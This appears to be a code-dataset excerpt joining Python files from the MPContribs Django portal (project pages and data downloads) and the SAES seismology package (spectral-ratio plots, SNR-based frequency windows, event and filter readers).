table["data"], columns=table["columns"], index=table["columns"][0]
)
def get_structure(self, sid):
"""Convenience function to get pymatgen structure."""
return Structure.from_dict(
self.structures.get_entry(
pk=sid, _fields=["lattice", "sites", "charge"]
).result()
)
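# Minimal illustration of the Borg pattern described in the Client docstring above.
# _BorgDemo is a hypothetical stand-in added for this sketch and is not part of the
# mpcontribs client: every instance shares one __dict__, so an attribute bound on any
# instance (think of the cached swagger spec) is immediately visible on all others.
class _BorgDemo:
    _shared_state = {}
    def __init__(self):
        self.__dict__ = self._shared_state
# first = _BorgDemo(); first.spec = "loaded once"
# second = _BorgDemo(); second.spec  -> "loaded once" (shared state, nothing reloaded)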
```
#### File: mpcontribs/portal/views.py
```python
import os
import json
import nbformat
from glob import glob
from nbconvert import HTMLExporter
from bs4 import BeautifulSoup
from fido.exceptions import HTTPTimeoutError
from json2html import Json2Html
from boltons.iterutils import remap
from django.shortcuts import render, redirect
from django.template import RequestContext
from django.http import HttpResponse
from django.template.loaders.app_directories import get_app_template_dirs
from django.template.loader import select_template
from mpcontribs.client import Client
S3_DOWNLOADS_BUCKET = os.environ.get("S3_DOWNLOADS_BUCKET", "mpcontribs-downloads")
S3_DOWNLOAD_URL = f"https://{S3_DOWNLOADS_BUCKET}.s3.amazonaws.com/"
j2h = Json2Html()
def visit(path, key, value):
if isinstance(value, dict) and "display" in value:
return key, value["display"]
return key not in ["value", "unit"]
def get_consumer(request):
names = ["X-Consumer-Groups", "X-Consumer-Username"]
headers = {}
for name in names:
key = f'HTTP_{name.upper().replace("-", "_")}'
value = request.META.get(key)
if value is not None:
headers[name] = value
return headers
def get_context(request):
ctx = RequestContext(request)
ctx["API_CNAME"] = os.environ["API_CNAME"]
ctx["API_PORT"] = os.environ["API_PORT"]
ctx["TRADEMARK"] = os.environ.get("TRADEMARK", "")
return ctx
def landingpage(request):
ctx = get_context(request)
try:
project = request.path.replace("/", "")
client = Client(headers=get_consumer(request))
prov = client.projects.get_entry(pk=project, _fields=["_all"]).result()
ctx["project"] = project
long_title = prov.get("long_title")
ctx["title"] = long_title if long_title else prov["title"]
ctx["descriptions"] = prov["description"].strip().split(".", 1)
authors = prov["authors"].strip().split(",", 1)
ctx["authors"] = {"main": authors[0].strip()}
if len(authors) > 1:
ctx["authors"]["etal"] = authors[1].strip()
ctx["urls"] = prov["urls"]
other = prov.get("other", "")
if other:
ctx["other"] = j2h.convert(
json=remap(other, visit=visit),
table_attributes='class="table is-bordered is-striped is-narrow is-hoverable is-fullwidth"',
)
if prov["columns"]:
ctx["columns"] = ["identifier", "id", "formula"] + list(
prov["columns"].keys()
)
ctx["search_columns"] = ["identifier", "formula"] + [
col
for col in prov["columns"].keys()
if not col.endswith("]") and not col.startswith("structures")
]
ctx["ranges"] = json.dumps(prov["columns"])
except Exception as ex:
ctx["alert"] = str(ex)
templates = [f"{project}_index.html", "landingpage.html"]
template = select_template(templates)
return HttpResponse(template.render(ctx.flatten(), request))
def index(request):
ctx = get_context(request)
cname = os.environ["PORTAL_CNAME"]
template_dir = get_app_template_dirs("templates/notebooks")[0]
htmls = os.path.join(template_dir, cname, "*.html")
ctx["notebooks"] = [
p.split("/" + cname + "/")[-1].replace(".html", "") for p in glob(htmls)
]
ctx["PORTAL_CNAME"] = cname
ctx["landing_pages"] = []
mask = ["project", "title", "authors", "is_public", "description", "urls"]
client = Client(headers=get_consumer(request)) # sets/returns global variable
entries = client.projects.get_entries(_fields=mask).result()["data"]
for entry in entries:
authors = entry["authors"].strip().split(",", 1)
if len(authors) > 1:
authors[1] = authors[1].strip()
entry["authors"] = authors
entry["description"] = entry["description"].split(".", 1)[0] + "."
ctx["landing_pages"].append(
entry
) # visibility governed by is_public flag and X-Consumer-Groups header
return render(request, "home.html", ctx.flatten())
def export_notebook(nb, cid):
nb = nbformat.from_dict(nb)
html_exporter = HTMLExporter()
html_exporter.template_file = "basic"
return html_exporter.from_notebook_node(nb)
def contribution(request, cid):
ctx = get_context(request)
client = Client(headers=get_consumer(request)) # sets/returns global variable
contrib = client.contributions.get_entry(pk=cid, _fields=["_all"]).result()
ctx["identifier"], ctx["cid"] = contrib["identifier"], contrib["id"]
nb = client.notebooks.get_entry(pk=cid).result() # generate notebook with cells
ctx["ncells"] = len(nb["cells"])
if not nb["cells"][-1]["outputs"]:
try:
nb = client.notebooks.get_entry(pk=cid).result(
timeout=1
) # trigger cell execution
except HTTPTimeoutError as e:
dots = '<span class="loader__dot">.</span><span class="loader__dot">.</span><span class="loader__dot">.</span>'
ctx["alert"] = f"Detail page is building in the background {dots}"
ctx["nb"], ctx["js"] = export_notebook(nb, cid)
return render(request, "contribution.html", ctx.flatten())
def cif(request, sid):
client = Client(headers=get_consumer(request)) # sets/returns global variable
cif = client.structures.get_entry(pk=sid, _fields=["cif"]).result()["cif"]
if cif:
response = HttpResponse(cif, content_type="text/plain")
response["Content-Disposition"] = "attachment; filename={}.cif".format(sid)
return response
return HttpResponse(status=404)
def download_json(request, cid):
client = Client(headers=get_consumer(request)) # sets/returns global variable
    contrib = client.contributions.get_entry(pk=cid, _fields=["_all"]).result()
if contrib:
jcontrib = json.dumps(contrib)
response = HttpResponse(jcontrib, content_type="application/json")
response["Content-Disposition"] = "attachment; filename={}.json".format(cid)
return response
return HttpResponse(status=404)
def csv(request, project):
from pandas import DataFrame
from pandas.io.json._normalize import nested_to_record
client = Client(headers=get_consumer(request)) # sets/returns global variable
contribs = client.contributions.get_entries(
project=project, _fields=["identifier", "id", "formula", "data"]
).result()[
"data"
] # first 20 only
data = []
for contrib in contribs:
data.append({})
for k, v in nested_to_record(contrib, sep=".").items():
if v is not None and not k.endswith(".value") and not k.endswith(".unit"):
vs = v.split(" ")
if k.endswith(".display") and len(vs) > 1:
key = k.replace("data.", "").replace(".display", "") + f" [{vs[1]}]"
data[-1][key] = vs[0]
else:
data[-1][k] = v
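    # Illustration (hypothetical field): after nested_to_record, a pair like
    #   "data.band_gap.display" -> "1.2 eV"
    # becomes the CSV column "band_gap [eV]" with value "1.2"; the matching
    # ".value"/".unit" keys are skipped above so each quantity appears only once.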
df = DataFrame(data)
response = HttpResponse(df.to_csv(), content_type="text/csv")
response["Content-Disposition"] = "attachment; filename={}.csv".format(project)
return response
def download(request, project):
cname = os.environ["PORTAL_CNAME"]
s3obj = f"{S3_DOWNLOAD_URL}{cname}/{project}.json.gz"
return redirect(s3obj)
# TODO check if exists, generate if not, progressbar...
# return HttpResponse(status=404)
def notebooks(request, nb):
return render(
request, os.path.join("notebooks", os.environ["PORTAL_CNAME"], nb + ".html")
)
def healthcheck(request):
return HttpResponse("OK")
``` |
{
"source": "Johumel/SAES",
"score": 3
} |
#### File: saes/create_plots/create_plots.py
```python
import matplotlib.transforms as transforms
from matplotlib.ticker import MaxNLocator, LogLocator
import matplotlib.pyplot as plt
import numpy as np
from ..handlers.save_output import save_output
from ..optimizer.fit_sin_spec import fit_sin_spec
from ..optimizer.fit_sin_spec_pll import fit_sin_spec_pll
from ..optimizer.sinspec_model import sinspec_model
from matplotlib import colors as clors
def colorlist(numspec):
if numspec < 27:
colortype = [ 'r', 'y','skyblue','rebeccapurple','peru','sienna',\
'indigo','purple','pink','palevioletred','turquoise',\
'coral','tomato','lightsteelblue','teal','firebrick',\
'orchid','olivedrab','bisque','thistle','orangered',\
'darkcyan','wheat','azure','salmon','linen']
else:
colors = dict(clors.BASE_COLORS, **clors.CSS4_COLORS)
hsv_sort = sorted((tuple(clors.rgb_to_hsv(clors.to_rgba(color)[:3])),
name)
for name, color in colors.items())
colortype = list(set([name for hsv, name in hsv_sort]))
return colortype
def plot_waveform(self,stn,nsstart,Ptime,Stime,time_win,evtype,axz,wv):
'''
This is used to plot waveforms of the event pairs shown in the
spectral ratio figure.
Input:
-------
stn --> event waveforms (3-components if available)
nsstart --> noise start time (UTC)
Ptime --> P-phase arrival time (UTC)
Stime --> S-phase arrival time (UTC)
time_win --> Time window length (seconds)
evtype --> event type (main or egf)
axz --> figure axes of the spectral ratio plot
wv --> wave type (P or S)
Return:
--------
None
'''
if axz:
if wv.upper() == 'S':
tr = stn.select(component= 'T')[0]
elif wv.upper() == 'P':
tr = stn.select(component='Z')[0]
nsstart = nsstart - tr.stats.starttime
axz.plot(tr.times(reftime = tr.stats.starttime) , tr.data, "k-",
label = tr.stats.channel)
axz.set_ylabel('Velocity (m/s)',fontsize = 23,fontweight='bold')
leg = axz.legend(loc=3,fontsize = 18,handlelength=0, handletextpad=0)
for item in leg.legendHandles:
item.set_visible(False)
axz.annotate("", xy=(nsstart, max(tr.data)*0.15),
xytext=(time_win+nsstart, max(tr.data)*0.15),
arrowprops=dict(arrowstyle="<->",facecolor='k'))
axz.text(nsstart+(time_win*0.3), 0.65,'Ns',fontsize=20,
fontweight='bold',
transform=transforms.blended_transform_factory(axz.transData,
axz.transAxes))
if Stime and self.wvtype2 == 'S':
Stimex = Stime - tr.stats.starttime
axz.text(Stimex - 0.85, max(tr.data)*0.7,'S',fontsize=22,
fontweight='bold')
axz.annotate("", xy=(Stimex - 0.55, max(tr.data)*0.75),
xytext=(Stimex - 0.15, max(tr.data)*0.20),
arrowprops=dict(arrowstyle="<-",facecolor='k',
connectionstyle="arc3"))
if Ptime and self.wvtype1 == 'P':
Ptimex = Ptime - tr.stats.starttime
axz.text(Ptimex - 0.85, max(tr.data)*0.5,'P',fontsize=22,
fontweight='bold')
axz.annotate("", xy=(Ptimex - 0.55, max(tr.data)*0.55),
xytext=(Ptimex - 0.15, max(tr.data)*0.05),
arrowprops=dict(arrowstyle="<-",facecolor='k',
connectionstyle="arc3"))
axz.tick_params(axis='both',which='both',length=5.,labelsize='large')
axz.get_yaxis().get_major_formatter().set_powerlimits((0, 0))
for tick in axz.yaxis.get_major_ticks():
tick.label.set_fontsize(24)
for tick in axz.xaxis.get_major_ticks():
tick.label.set_fontsize(24)
axz.set_xlim([0,max(tr.times(reftime = tr.stats.starttime))])
axz.yaxis.get_offset_text().set_fontsize(24)
axz.set_xlabel('Time (s)',fontsize = 26,fontweight='bold')
if evtype[0] == 'e':
axz.set_title('%s' % ('Auxiliary event'),fontweight='bold',
fontsize=22)
axz.text(0.2,0.10,tr.stats.station.strip(),fontsize=22,
fontweight='bold',transform=axz.transAxes)
else:
            axz.set_title('%s' % ('Main event'),fontweight='bold',fontsize=22)
axz.text(0.2,0.10,stn[0].stats.station.strip(),fontsize=22,
fontweight='bold',transform=axz.transAxes)
axz.yaxis.set_major_locator(MaxNLocator(integer=True,nbins=3))
axz.xaxis.set_major_locator(MaxNLocator(integer=True,nbins=5))
return None
def make_figures_spec(self,specmain,freqmain,wmfc,wm,wmn,wefc,we,wen,indexx,
time_win,mainfile,egffile,wv):
'''
    Function for creating and organizing the spectral ratio plots.
All the subplots (axes) are initiated and organized here.
'''
from obspy.core import read
from ..analyzer import get_sig_nois_data
lste = list(specmain.keys())
colortype = colorlist(len(lste))
fig = plt.figure(1,figsize=(16,9),tight_layout=True)
fig.subplots_adjust(hspace = .2,wspace=0.1)
ax_spec = plt.subplot2grid((3, 2), (1, 1), rowspan = 2,colspan = 1)
axx = plt.subplot2grid((3, 2), (1, 0), rowspan = 2)
colornum = 0
Ptime,Stime = None,None
if indexx:
et1 = egffile[indexx]
axs = plt.subplot2grid((3, 2), (0, 1))
st = read(et1)
if self.S_tt[self.egfev]:
for i in self.S_tt[self.egfev]:
if i[1] == st[0].stats.station.strip():
Stime = i[0]
if self.P_tt[self.egfev]:
for i in self.P_tt[self.egfev]:
if i[1] == st[0].stats.station.strip():
Ptime = i[0]
origtime = self.evlist[self.egfev][0]
baz = self.baz['egf']
if baz < 0:
baz = baz + 360
_,_,nsstart,stn,_ = get_sig_nois_data(self,et1,origtime,Ptime,Stime,
time_win,True,None,self.egfev,
baz,'yes')
trn = stn.select(component='N')
trn += stn.select(component='E')
trn.rotate('NE->RT',back_azimuth=baz)
stn[1] = trn[1]
plot_waveform(self,stn,nsstart,Ptime,Stime,time_win,'egf',axs,wv)
et2 = mainfile[indexx]
if self.S_tt[self.mainev]:
for i in self.S_tt[self.mainev]:
if i[1] == st[0].stats.station.strip():
Stime = i[0]
if self.P_tt[self.mainev]:
for i in self.P_tt[self.mainev]:
if i[1] == st[0].stats.station.strip():
Ptime = i[0]
origtime = self.evlist[self.mainev][0]
baz = self.baz['main']
if baz < 0:
baz = baz + 360
_,_,nsstart,stn,_ = get_sig_nois_data(self,et2,origtime,Ptime,Stime,
time_win,True,None,self.mainev,
baz,'yes')
trn = stn.select(component='N')
trn += stn.select(component='E')
trn.rotate('NE->RT',back_azimuth=baz)
stn[1] = trn[1]
axs = plt.subplot2grid((3, 2), (0, 0))
plot_waveform(self,stn,nsstart,Ptime,Stime,time_win,'main',axs,wv)
for index in range(len(lste)):
station=lste[index]
ax_spec.loglog(freqmain[lste[index]],specmain[lste[index]],
linewidth = 1,color = colortype[colornum],
label = station)
if lste[index] == indexx:
if freqmain[indexx][0] == 0:
x_begin = freqmain[indexx][1]
else:
x_begin = freqmain[indexx][0]
try:
x_end = self.stationlist[indexx]['pre_filt'][2]
except:
x_end = 45.
pass
ploting(x1 = wmfc[indexx],y1 = wm[indexx],y12 = wmn[indexx],
x2 = wefc[indexx],
y2 = we[indexx],y22 = wen[indexx],ax = axx,
station = station,color = colortype[colornum],
x_begin=x_begin,x_end=x_end,wv=wv)
# xlim1 = 10**(np.floor(np.log10(x_begin)))
ax_spec.set_xlim([x_begin,x_end])
colornum += 1
return fig,ax_spec
def ploting(x1,y1,y12,x2,y2,y22,ax,station,color,x_begin,x_end,wv):
'''
Handles example event pair plot shown on the bottom left of
the spectral ratio figure. This figures gives an idea of the SNR for the
example events
'''
ax.loglog(x1,y1,linewidth = 3, label = 'Main event',color = color ) # Main event
ax.loglog(x1,y12,linewidth = 2,ls='--', alpha=0.7,
label = 'Main event noise',color=color)
ax.loglog(x2,y2,linewidth = 2, ls='-',label = 'Auxiliary event',
color='darkgray') #EGFs for single EGF analysis
ax.loglog(x2,y22,linewidth = 1.5,ls='-.',label = 'Auxiliary event noise',
color='lightgray')
ax.text(0.7,0.1,'%s wave' % wv,style = 'normal',weight='bold',size=16,
transform=ax.transAxes)
ax.text(0.7,0.9,station,style = 'normal',weight='bold',size=18,
transform = ax.transAxes)
ax.set_xlim([x_begin,x_end])
ax.set_ylim([y22[-1]*0.5,max(y1)*10])
ax.yaxis.set_major_locator(LogLocator(base=10.0, numticks=5))
ax.set_xlabel('Frequency (Hz)',fontsize=24,fontweight='bold')
ax.set_ylabel('Amplitude (nm/Hz)',fontsize=24,fontweight='bold')
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(20)
ax.get_xaxis().get_major_formatter().labelOnlyBase = True
ax.get_xaxis().get_minor_formatter().labelOnlyBase = False
ax.tick_params(axis='x',which='minor',bottom='on')
ax.tick_params(axis='both',which='both',length=4.0)
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(20)
ax.legend(loc='lower left',ncol=1,prop={'size':17})
return None
def specrat_fit_plot(self,freqbin,specratio,mtpl,freqperturb,
allresidua1,ax,popt,maxy):
'''
Function to create the bottom right figure (axes) of the spectral
ratio plot. Individual spectral ratios of each station and the
    representative spectral ratio for the event pair are organised and plotted
by this function.
'''
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from ..optimizer import specr_model
mtpl = mtpl
specratio = np.multiply(specratio,mtpl,dtype=float)
residua = np.power(np.subtract(specratio,specr_model(freqbin, *popt)),2)
normresidua = np.sqrt(np.sum(residua)/np.sum(np.power(specratio,2)))
if popt.any():
ax.loglog(freqbin,np.divide(specr_model(freqbin, *popt),mtpl),
'g--', label='model fit',linewidth = 5)
ax.text(0.55,0.1,'M$_L$$_($$_1$$_)$ = %s' % self.evlist[self.mainev][1][3],
style = 'normal',weight='bold',size=14,transform=ax.transAxes)
ax.text(0.55,0.05,'M$_L$$_($$_2$$_)$ = %s' % self.evlist[self.egfev][1][3],
style = 'normal',weight='bold',size=14,transform=ax.transAxes)
ax.text(0.55,0.15,'rms = %.2f' %(normresidua),style = 'normal',
weight='bold',size=14,transform=ax.transAxes)
try:
xbin = np.where(freqbin >= popt[0])[0][0]
ybin = np.divide(specr_model(freqbin, *popt),mtpl)[xbin]
ax.text(popt[0]*0.95,ybin*1.25,'f$_c$$_($$_1$$_)$ = %s' \
%(float(round(popt[0],1))),style = 'normal',
weight='bold',size=14)
ax.loglog(popt[0]*1.0,ybin*1.12,marker="v",color='green',
markersize=10)
if self.showfc2.upper() == 'YES':
xbin2 = np.where(freqbin >= popt[1])[0][0]
ybin2 = np.divide(specr_model(freqbin, *popt),mtpl)[xbin2]
ax.text(popt[1]*0.55,ybin2*0.7,'f$_c$$_($$_2$$_)$ = %s' \
%(float(round(popt[1],1))),style = 'normal',
weight='bold',size=14)
ax.loglog(popt[1],ybin2*0.9,marker="^",color='green',
markersize=10)
except:
pass
upl = 10**(np.floor(np.log10(maxy*10)))
upl1 = 10**(np.floor(np.log10(maxy)))
if upl/upl1 > 20:
upl = 10**(np.floor(np.log10(maxy*10)))
ax.set_ylim([min(specratio)*0.15/mtpl,upl*3])#0.025
ax.get_xaxis().get_major_formatter().labelOnlyBase = True
ax.get_xaxis().get_minor_formatter().labelOnlyBase = True
ax.set_xlabel('Frequency (Hz)',fontsize = 24,fontweight='bold')
ax.set_ylabel('Spectral Ratio',fontsize = 24,fontweight='bold')
ax.legend(loc='upper left',ncol=1,prop={'size':20})
ax.tick_params(axis='both',which='both',length=5.)
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(20)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(20)
if ax:
inset_axin = inset_axes(ax,
width="30%",
height="25%",
loc=3,
borderpad=4.8)
tempx = []; tempy = []
for h in range(len(freqperturb)):
if allresidua1[h] < 0.57:
tempy.append(allresidua1[h])
tempx.append(freqperturb[h])
index1 = np.where(allresidua1 == min(allresidua1))[0][0]
y1 = allresidua1[index1]
x1 = freqperturb[index1]
inset_axin.semilogx(tempx,tempy,'o',ms=3,mfc = 'blue')
inset_axin.semilogx(x1,y1,'*',mfc='blue',ms=8,mec='red')
bb = np.floor(np.log10(min(tempx)))#.round()-1
inset_axin.set_xlim([(10**bb)*5,max(tempx)*2])
inset_axin.xaxis.set_major_locator(LogLocator(base=10.0, numticks=3))
inset_axin.set_ylim([0,0.6])
inset_axin.set_yticks(np.linspace(0,0.6,endpoint=True,num=4))
inset_axin.set_xlabel('Corner Frequency (Hz)',fontsize = 13,fontweight='bold')
inset_axin.set_ylabel('RMS',fontsize = 13,fontweight='bold')
inset_axin.get_xaxis().get_major_formatter().labelOnlyBase = True
inset_axin.get_xaxis().get_minor_formatter().labelOnlyBase = True
inset_axin.tick_params(axis='both',which='both',length=3.5)
for tick in inset_axin.xaxis.get_major_ticks():
tick.label.set_fontsize(11)
for tick in inset_axin.yaxis.get_major_ticks():
tick.label.set_fontsize(11)
ax.legend(loc='upper right',ncol=4,prop={'size':11})
return None
def make_figures_ind(self,wm,wmfc,wmn,trtm,wv):
'''
Handler for individual spectra analysis spectral fitting and figure
creation.
Input:
-------
wm --> individual signal spectra
wmfc --> individual signal spectra frequency bins
wmn --> individual noise spectra
trtm --> Travel times of the events contained in wm
wv --> wave type (P or S)
Returns:
---------
It returns None but fits individual spectra and dispatches spectrum
fitting results.
'''
colornum = 0
fig = plt.figure(figsize=(16,10),tight_layout=True)
lste = list(wm.keys())
colortype = colorlist(len(lste))
n = 1; m = 1
for index in range(len(lste)):
station = lste[index]
fn = wmfc[lste[index]]
try:
if self.numworkers <= 1:
popt_ind,pcov_ind = fit_sin_spec(wm[lste[index]],fn,station,
min(wmfc[lste[index]]),
max(wmfc[lste[index]])*2.5,
trtm[lste[index]],
self.autofit_single_spec,
self.source_model)
elif self.numworkers > 1:
popt_ind,pcov_ind = fit_sin_spec_pll(wm[lste[index]],fn,station,
min(wmfc[lste[index]]),
max(wmfc[lste[index]])*2.5,
trtm[lste[index]],
self.source_model,self.numworkers)
axx2 = fig.add_subplot(2,3,n)
if fn[0] == 0:
bb = fn[1]
else:
bb = fn[0]
# bb = np.floor(np.log10(min(fn)))
x_end = self.stationlist[station]['pre_filt'][2]
axx2.set_xlim([bb,x_end])
fig.subplots_adjust(hspace = .2,wspace = 0.0)
dlim = int(min(len(wmfc[lste[index]]),len(wmn[lste[index]])) - 1)
axx2.loglog(wmfc[lste[index]][0:dlim],wm[lste[index]][0:dlim],linewidth = 1,color = colortype[colornum],label = 'data')
axx2.loglog(fn, sinspec_model(fn, *popt_ind), 'k--', label='model fit',
linewidth=2)
axx2.loglog(wmfc[lste[index]][0:dlim],wmn[lste[index]][0:dlim],linewidth = 1,color = 'gray',alpha = 0.6,label = 'noise')
axx2.get_xaxis().get_major_formatter().labelOnlyBase = True
axx2.get_xaxis().get_minor_formatter().labelOnlyBase = False
axx2.tick_params(axis='x',which='minor',bottom='on')
axx2.tick_params(labelsize='large')
for tick in axx2.xaxis.get_major_ticks():
tick.label.set_fontsize(20)
for tick in axx2.yaxis.get_major_ticks():
tick.label.set_fontsize(20)
axx2.set_xlabel('Frequency (Hz)',fontsize=24)
axx2.set_ylabel('Amplitude (nm/Hz)',fontsize=24)
axx2.legend(loc='lower left',ncol=1,prop={'size':18})
axx2.text(0.2, 0.5, station,fontsize=20, horizontalalignment='center',verticalalignment='center', transform=axx2.transAxes)
lm,hm = axx2.get_ylim()
axx2.set_ylim([lm,hm*10])
try:
xbin = np.where(fn >= popt_ind[1])[0][0]
except:
fig.delaxes(fig.axes[len(fig.axes)-1])
pass
axx2.text(popt_ind[1]*.8,wm[lste[index]][xbin]*1.8,'f$_c$ = %s' %(float(round(popt_ind[1],1))),style = 'normal',weight='bold',size=17)
axx2.loglog(popt_ind[1],wm[lste[index]][xbin]*1.2,marker="v",color='green',markersize=10)
axx2.yaxis.set_major_locator(LogLocator(base=10.0, numticks=4))
axx2.text(0.6,0.2,'%s wave' % wv,style = 'normal',weight='bold',size=16,transform=axx2.transAxes)
colornum += 1
if pcov_ind[0] is not None:
save_output(self,None,None, None,popt_ind, pcov_ind,station,wv)
# popt_ind,pcov_ind = [],[]
n = len(fig.axes)+1
if n > 6:
save_fig(self,fig,'ind', m,wv)
plt.close()
fig = plt.figure(figsize=(16,10),tight_layout=True)
n = 1
m += 1
except:
pass
try:
if fig.axes[0]:
save_fig(self,fig,'ind',m,wv)
plt.close()
except:
pass
return None
def stf_plot(self,x,y,wv):
'''
Designed to handle source time function plots but this option is not
yet activated, stay tuned!
'''
# y = [i*np.sign(i) for i in y]
fig = plt.figure(figsize=(6,3))
ax = fig.add_subplot(111)
ax.plot(x,y,'k',linewidth=1.5)
ax.set_xlabel('Time (s)',fontsize=20)
ax.fill_between(x, y, facecolor='gray', alpha=0.5)
for tick in ax.xaxis.get_major_ticks():tick.label.set_fontsize(18)
for tick in ax.yaxis.get_major_ticks():tick.label.set_fontsize(18)
save_fig(self,fig,'stf',None,wv)
return None
def save_fig(self,fig,figtype,mm,wv):
'''
    All created figures are saved by this function. The default dpi
for each figure is 300.
'''
if figtype == 'spec':
fig.subplots_adjust(hspace = .1,wspace=0.1)
fig.tight_layout()
imagefile = self.output_dir+self.mainev+'_'+self.egfev+'_'+wv+'_'+str(mm)+'.pdf'
fig.savefig(imagefile, format='pdf', dpi=300)
fig.clf()
if figtype == 'ind':
imagefile = self.output_dir+self.mainev+'_sinspec_'+wv+'_'+str(mm)+'.pdf'
fig.savefig(imagefile, format='pdf', dpi=300)
fig.clf()
if figtype == 'stf':
imagefile = self.output_dir+self.mainev+'_'+self.egfev+'_'+wv+'_STF.pdf'
fig.savefig(imagefile, format='pdf', dpi=300)
fig.clf()
return None
```
#### File: src/analyzer/get_good_snr_freq_range.py
```python
import numpy as np
def get_good_snr_freq_range(snrthres,signal1,signal2,snr1,snr2,freqsignal1,freqsignal2,noise1,noise2):
"""
Function to determine useable frequency range of spectra based on the
signal-to-noise ratio [SNR]
Inputs:
---------
snrthres: user-defined SNR (defaults to 2)
signal1: signal spectrum of event 1
signal2: signal spectrum of event 2 (if available)
snr1: SNR of event 1
snr2: SNR of event 2 (if available)
freqsignal1: frequency bins of signal 1
freqsignal2: frequency bins of signal 2
noise1: noise spectrum of event 1
noise2: noise spectrum of event 2
Returns:
----------
    datas: signal1 windowed over the frequency range where the SNR threshold is met or surpassed
    datae: signal2 (if available) windowed over the frequency range where the SNR threshold is met or surpassed
    fnm: frequency range of signal1 where the SNR threshold is met or surpassed
    fne: frequency range of signal2 where the SNR threshold is met or surpassed
    noisem: event1 noise windowed over the frequency range where the SNR threshold is met or surpassed
    noisee: event2 noise windowed over the frequency range where the SNR threshold is met or surpassed
    Note: fnm and fne are exactly the same when analysing spectral ratios; fne is
    None when analysing a single spectrum
"""
datas = None; datae = None; fnm = None; fne = None;
noisem = None; noisee = None;
quit_calc = 'N'
try:
try:
spm_low = np.where(snr1 >= snrthres )[0][0]
except:
spm_low = 0
try:
half_up = snr1[slice(spm_low,len(snr1)-1)]
spm_high = np.where(half_up < snrthres )[0][0] + spm_low
except:
spm_high = len(snr1) - 1
except:
quit_calc = 'Y'
pass
if signal2 is not None:
try:
spe_low = np.where(snr2 >= snrthres)[0][0]
except:
spe_low = 0
try:
half_up = snr2[slice(spe_low,len(snr2)-1)]
spe_high = np.where(half_up < snrthres )[0][0] + spe_low
except:
spe_high = len(snr2) - 1
low_end = max(spe_low,spm_low)
high_end = min(spe_high,spm_high)
fnm = freqsignal1[slice(low_end,high_end)] # change to sp later
fne = freqsignal2[slice(low_end,high_end)]
datas = signal1[slice(low_end,high_end)] # change to sp later
datae = signal2[slice(low_end,high_end)]
noisem = noise1[slice(low_end,high_end)]
noisee = noise2[slice(low_end,high_end)]
else:
if quit_calc == 'N':
fnm = freqsignal1[slice(spm_low,spm_high)] # change to sp later
datas = signal1[slice(spm_low,spm_high)] # change to sp later
noisem = noise1[slice(spm_low,spm_high)]
return datas,datae,fnm,fne,noisem,noisee
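# Hypothetical usage sketch (added for illustration, not part of the original module):
# exercises the single-spectrum path (signal2=None) with made-up spectra whose SNR
# exceeds the threshold of 2 only between roughly 2 and 20 Hz.
if __name__ == "__main__":
    freqs = np.linspace(0.5, 50.0, 100)
    noise = np.ones_like(freqs)
    signal = np.where((freqs > 2.0) & (freqs < 20.0), 10.0, 1.0)
    snr = signal / noise
    datas, datae, fnm, fne, noisem, noisee = get_good_snr_freq_range(
        2.0, signal, None, snr, None, freqs, None, noise, None)
    # datas/fnm/noisem are trimmed to the usable band; datae/fne/noisee stay None here
    print(fnm[0], fnm[-1])  # approximately the 2-20 Hz band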
```
#### File: src/saesutils/get_prefilts.py
```python
import numpy as np
import re
def get_prefilts(self):
"""
Description:
------------
Read the pre-defined response removal frequency range for each station.
"""
prefilts = open(self.maindir+'/input/pre_filt.list').readlines()
list1 = [list(filter(None, re.split('[: \n#]',prefilts[j])))[0] for j in range(len(prefilts)-1) if prefilts[j] != '\n']
list2 = [list(filter(None, re.split('[: \n#]',prefilts[j])))[1] for j in range(len(prefilts)-1) if prefilts[j] != '\n']
list1 = np.asarray(list1)
list2 = np.asarray(list2)
for i in range(len(list1)):
try:
prefilt = [float(j) for j in list2[i][1:-1].split(',')]
if len(prefilt) == 4:
self.stationlist[list1[i]]['pre_filt'] = prefilt
except:
prefilt = None
pass
return None
```
#### File: src/saesutils/get_time_window.py
```python
import numpy as np
def get_time_window(mag):
"""
Description:
------------
    This is to estimate a time window based on the magnitude of the event,
    keeping in mind that, in adherence to Parseval's theorem, the minimum
    resolvable frequency is the inverse of the data length in seconds. Here we
    assume Vs = 3.75 km/s; a future release may use the iasp91 velocity model or a
    user-defined velocity model. We assume a constant stress drop of 10 MPa
    and Brune's model.
    Parameters:
    ----------
    mag --> earthquake magnitude.
    Returns/Modifications:
----------------------
time_win --> time window.
"""
Vs = 3750.
fc = 0.37*Vs*(16*0.1*1e6/(7*np.power(10,(1.5*(mag + 6.073)))))**(1./3.)
time_win = np.floor(1./fc)
if time_win < 1.0:
time_win = 1.0
return 2.*time_win
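# Hypothetical demo (added for illustration, not part of the original module): with the
# constants hard-coded above (Vs = 3750 m/s and a Brune-type corner-frequency relation),
# the returned window grows with magnitude and is never shorter than 2 s.
if __name__ == "__main__":
    for demo_mag in (3.0, 4.0, 5.0):
        print(demo_mag, get_time_window(demo_mag))  # roughly 2.0, 2.0 and 8.0 seconds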
```
#### File: src/saesutils/read_eventlist.py
```python
import numpy as np
from obspy.core import UTCDateTime
def read_eventlist(self):
"""
Description:
------------
    Read events information.
Input:
-------
events.dat:
year month day hour minute second lat lon depth magnitude eventID
Returns:
---------
None
"""
data = np.genfromtxt(self.maindir+'/input/events.dat',skip_header=1,dtype='U24')
if self.whitelist_evl and not self.blacklist_evl:
evids = self.whitelist_evl
elif self.whitelist_evl and self.blacklist_evl:
evids = [i for i in self.whitelist_evl if i not in self.blacklist_evl]
elif self.blacklist_evl and not self.whitelist_evl:
evids = [str(int(data[i][10])) for i in range(len(data)) if str(int(data[i][10])) not in self.blacklist_evl]
else:
evids = [str(int(data[i][10])) for i in range(len(data))]
allids = np.asarray([str(int(data[i][10])) for i in range(len(data))])
times,metadata = [],[]
for i in range(len(evids)):
index = np.where(allids == evids[i])[0]
if index.size > 0:
index = index[0]
times.append(UTCDateTime(int(data[index][0]),int(data[index][1]),int(data[index][2]),int(data[index][3]),
int(data[index][4]),float(data[index][5])))
metadata.append([float(data[index][6]),float(data[index][7]),float(data[index][8]),float(data[index][9])])
for i,j,k in zip(evids,times,metadata):
self.evlist[i] = []
self.evlist[i].append(j)
self.evlist[i].append(k)
return None
``` |
